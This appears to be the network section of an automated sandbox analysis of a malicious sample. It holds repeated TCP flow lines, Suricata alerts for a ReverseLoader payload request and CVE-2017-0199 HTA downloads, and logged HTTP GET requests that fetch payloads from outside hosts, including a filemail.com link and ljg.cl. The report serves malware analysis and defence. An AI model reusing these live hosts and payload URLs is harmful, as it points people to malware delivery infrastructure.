      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 152.231.117.86:443
      Source: global trafficTCP traffic: 152.231.117.86:443 -> 192.168.2.22:49165
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80
      Source: global trafficTCP traffic: 172.245.123.29:80 -> 192.168.2.22:49166
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.29:80

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 172.245.123.29:80
      Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.29:80 -> 192.168.2.22:49166
      Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.29:80 -> 192.168.2.22:49164
      Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 193.30.119.205 193.30.119.205
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.123.29:80
      Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.123.29:80
      Source: global trafficHTTP traffic detected: GET /G5dF?&rank=uttermost&fan=decorous&barracks=drunk&kettledrum=flippant&banana=loose&bathroom HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
